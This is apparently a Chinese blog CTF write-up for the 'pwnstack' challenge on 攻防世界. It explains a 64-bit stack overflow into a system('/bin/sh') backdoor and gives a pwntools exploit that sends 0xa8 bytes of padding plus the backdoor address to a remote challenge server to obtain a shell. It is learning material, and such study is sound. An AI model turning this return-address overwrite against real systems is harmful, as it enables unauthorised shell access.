当前位置: 首页 > news >正文

攻防世界1

news 2025/7/2 23:39:30

pwnstack

发现是64位文件

发现vuln双击进入

看到read知道这里是要将B1(177)的数据输入buf,这里涉及了栈溢出

发现system和binsh

后门

A8十进制是168

exp:

from pwn import *
context(os='linux',arch='amd64',log_level='debug')
io = remote('61.147.171.105','52779')
padding = b'a'*(0xa8)
door = 0x400762
payload = padding + p64(door)
io.sendline(payload)
io.interactive()


http://www.mrgr.cn/news/47960.html

相关文章:

  • 51单片机数码管循环显示0~f
  • F开头的词根词缀:ful
  • 关于不建议使用北京新网数码信息技术公司的服务器和虚拟机的说明(重要说明)
  • PSD18C-LF-T7 高功率TVS射线管芯片IC
  • AcWing算法提高课 1.2.2 最长上升子序列模型(二)
  • 云原生后端
  • uni-app关闭底部系统导航栏的控制按钮BUG
  • Pura 70系列和Pocket 2已支持升级尝鲜鸿蒙NEXT,报名教程在这里
  • 进程的理解
  • 单例模式和读者写者问题
  • 找不到xinput1_3.dll怎么解决,快来试试这个几个方法
  • Java获取当前年月日
  • 活动队列
  • 让你的MacOS剪切板变得更加强大,如何解决复制内容覆盖的问题
  • ORA-01005: null password given; logon denied
  • 数据结构 -- 跳表
  • 耳机座接口会被TYPE-C取代吗?
  • Leetcode.300 最长递增子序列
  • 如何做独立站将产品卖到国外?从零开始打造你的全球电商帝国
  • C语言复习第0章 基础语法